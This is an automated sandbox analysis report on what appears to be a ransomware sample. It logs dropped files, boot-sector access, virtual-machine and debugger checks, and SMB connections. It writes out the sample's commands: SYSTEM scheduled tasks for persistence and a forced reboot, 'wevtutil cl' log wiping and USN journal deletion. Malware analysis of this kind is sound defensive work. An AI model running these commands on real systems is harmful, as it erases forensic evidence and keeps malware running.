          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositorycore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
          Source: C:\Windows\dispci.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
          Source: DECRYPT.lnk.32.drLNK file: ..\..\..\Windows\dispci.exe
          Source: LisectAVT_2403002C_35.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: lsasrv.pdb source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: lsasrv.pdbUGP source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_04BF9016
          Source: LisectAVT_2403002C_35.exeStatic PE information: real checksum: 0x79289 should be: 0x79294
          Source: C:\Windows\dispci.exeCode function: 32_2_00A879B5 push ecx; ret 32_2_00A879C8

          Persistence and Installation Behavior

          barindex
          Contains functionality to infect the boot sector
          Source: C:\Windows\dispci.exeCode function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d32_2_00A839E0
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\D99F.tmpJump to behavior
          Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\dispci.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

          Boot Survival

          barindex
          Contains functionality to infect the boot sector
          Source: C:\Windows\dispci.exeCode function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d32_2_00A839E0
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after checking computer name)
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_3-4956
          Found evasive API chain (may stop execution after checking mutex)
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4958
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\dispci.exeCode function: 32_2_00A83FC0 rdtsc 32_2_00A83FC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,FindCloseChangeNotification,LocalFree,3_2_04BF8B2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,3_2_04BF7D4E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,3_2_04BF8D39
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-5772
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\cscc.datJump to dropped file
          Source: C:\Windows\dispci.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Windows\D99F.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_19-3494
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7572Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6296Thread sleep time: -900000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7568Thread sleep time: -200000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7640Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4100Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_04BF5E9F
          Source: C:\Windows\dispci.exeCode function: 32_2_00A81B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,32_2_00A81B80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5A73
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
          Source: rundll32.exe, 00000003.00000002.1325768430.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2727251396.0000017215858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2726294401.0000017210029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
          Source: rundll32.exe, 00000003.00000002.1325768430.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-4878
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-4966
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-4860
          Source: C:\Windows\D99F.tmpAPI call chain: ExitProcess graph end nodegraph_19-3495
          Source: C:\Windows\System32\cdd.dllSystem information queried: ModuleInformation
          Source: C:\Windows\D99F.tmpProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\dispci.exeCode function: 32_2_00A83FC0 rdtsc 32_2_00A83FC0
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF6097571F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6097571F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_04BF9016
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_005110C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_005110C0
          Source: C:\Windows\D99F.tmpProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_00511499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,0_2_00511499
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF6097571F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6097571F0
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF6097557FC SetUnhandledExceptionFilter,19_2_00007FF6097557FC
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF609755540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF609755540
          Source: C:\Windows\dispci.exeCode function: 32_2_00A85C9F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00A85C9F
          Source: C:\Windows\dispci.exeCode function: 32_2_00A8A966 SetUnhandledExceptionFilter,32_2_00A8A966
          Source: C:\Windows\dispci.exeCode function: 32_2_00A87757 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00A87757

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.98.116.138 445Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SetupJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SystemJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SecurityJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl ApplicationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogonJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_04BF6FFE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,3_2_04BF841D
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\dispci.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
